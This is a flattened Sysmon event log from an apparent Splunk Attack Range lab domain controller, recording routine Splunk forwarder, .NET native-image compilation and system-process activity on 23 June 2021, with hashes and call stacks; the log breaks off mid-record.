Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:54.046{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A17D-60D3-1403-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:53.875{4DB9351A-A17D-60D3-1403-00000000CF01}7124C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.952{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39EB25A67CBF7ABBC174223E485574F0,SHA256=ED560153AA04D7FD03AB2F66DBC2F5EF998241586AC6960EBEAB06F1E2A087A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.937{4DB9351A-A17F-60D3-1A03-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0FZ81IDWXL\System.Xml.Linq.ni.dll.auxMD5=61E8A8E3E699A8059F5FA65524029959,SHA256=95C52501934AA36E9D0AF3EA88BA021548E16D7033393C75EDBDD0583DD60CD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.937{4DB9351A-A17F-60D3-1A03-00000000CF01}2636NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0FZ81IDWXL\System.Xml.Linq.ni.dllMD5=AA90C6B3EA58C5485906FE122BC782CC,SHA256=65A337C5A67DA88E01B91068F0A6BD7AA15184B2C9E2F73D276B2D1307F0EC25,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:55.921{4DB9351A-A17F-60D3-1A03-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a4c-0\System.Xml.Linq.dll2021-06-23 21:02:55.921 10341000x800000000000000019860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A17F-60D3-1903-00000000CF01}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019857Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019856Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A17F-60D3-1903-00000000CF01}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.796{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A17F-60D3-1903-00000000CF01}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.642{4DB9351A-A17F-60D3-1903-00000000CF01}6908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.702{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17F-60D3-1A03-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.687{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A17F-60D3-1A03-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.687{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17F-60D3-1A03-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.538{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17F-60D3-1803-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.507{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A17F-60D3-1803-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.507{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17F-60D3-1803-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.444{4DB9351A-A17F-60D3-1703-00000000CF01}7100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\V7W2GH57A6\System.Net.Http.ni.dll.auxMD5=AC82C3BB4D68CD298ECB6826267CE6EE,SHA256=D1C3FCBA0E71F8909B7C33FB0ED4696908F0C0CD53E307E78C14648434CF462A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.429{4DB9351A-A17F-60D3-1703-00000000CF01}7100NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\V7W2GH57A6\System.Net.Http.ni.dllMD5=D9A222040D5C3C5602CB1DBFEE5A9340,SHA256=228F92CA14A294CAE5048BB505B64902B720A36864A4161332D207622ACDE7CF,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:55.413{4DB9351A-A17F-60D3-1703-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bbc-0\System.Net.Http.dll2021-06-23 21:02:55.413 23542300x800000000000000019843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.397{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5179E9D164CA020A5BED5DA62C133C96,SHA256=58BB6C0BCEAED302F0E58262758F37100CED590F6F10D003DF8E17ECDD2B3A27,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.069{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17F-60D3-1703-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.054{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A17F-60D3-1703-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:55.054{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17F-60D3-1703-00000000CF01}7100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.827{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C1EE506BB9DA5CC7A3C64B2B5A08634F,SHA256=0EFEB4F6F0BFF9C29F679F5DCB696EA59B53D52560EE6EB28CEA1BFDFE114C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.827{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1C1658BAB21FEAC514ECED6F5E9DA1C1,SHA256=96B94EDD0ADC5F13BB317864D5699589BBF2527DED4FB84359F14E2683FEC8E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019875Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.643{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=262531D7E38226234C15404BC7373856,SHA256=53938BCD9A60D4DF61DC566C15CAB529B1B0069A82831EEBF7DED9AF34981663,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019874Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:56.546{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A180-60D3-1C03-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019873Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 